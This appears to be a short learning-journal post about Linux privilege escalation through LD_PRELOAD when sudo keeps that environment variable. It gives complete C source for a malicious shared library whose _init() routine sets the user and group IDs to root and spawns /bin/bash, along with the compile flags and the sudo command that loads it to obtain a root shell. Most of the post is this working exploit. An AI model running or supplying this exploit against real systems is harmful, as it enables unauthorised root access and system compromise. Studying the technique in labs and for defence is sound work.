🛠️ The Security Auditor's Toolkit: LD_PRELOAD
The core of this exploit lies in the way Linux handles dynamic linking. When you run a program, the system looks for shared libraries. LD_PRELOAD tells the system: "Load my library first."
1. The Vulnerability
If sudo -l shows that you can run a command and the environment variable LD_PRELOAD is not reset or restricted, you can inject your own code into a root process.
2. Crafting the Malicious Library
I practiced writing a simple C wrapper that executes as soon as the library is initialized:
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
setuid(0); // Set User ID to Root
setgid(0); // Set Group ID to Root
system("/bin/bash"); // Spawn the shell
}
3. The Injection
After compiling the library with gcc -fPIC -shared, the escalation is just one command away:
sudo LD_PRELOAD=/tmp/root.so <any_allowed_command>
Because the _init() function runs before the actual command, the system spawns a root shell immediately.
Follow my journey: #1HourADayJourney
Top comments (0)